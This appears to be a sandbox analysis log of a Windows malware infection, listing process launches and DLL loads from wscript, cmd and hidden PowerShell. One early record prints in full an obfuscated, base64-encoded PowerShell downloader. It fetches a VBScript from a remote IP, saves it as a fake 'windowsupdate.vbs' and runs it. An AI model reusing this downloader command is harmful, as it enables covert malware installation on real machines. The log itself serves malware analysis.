Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5044 -ip 5044
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'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'+[cHAr]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\DeviceCredentialDeployment.exe "C:\Windows\system32\DeviceCredentialDeployment.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\windowsupdate.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES509F.tmp" "c:\Users\user\AppData\Local\Temp\CSC8F7BB283C99B46799FCDCA9D84A75A0.TMP"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('[base64-encoded payload omitted]
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process created: unknown unknown
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\DeviceCredentialDeployment.exe | Section loaded: devicecredential.dll
                  Source: C:\Windows\System32\DeviceCredentialDeployment.exe | Section loaded: powrprof.dll
                  Source: C:\Windows\System32\DeviceCredentialDeployment.exe | Section loaded: umpdc.dll
                  Source: C:\Windows\System32\DeviceCredentialDeployment.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mshtml.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wkscli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msiso.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windowscodecs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
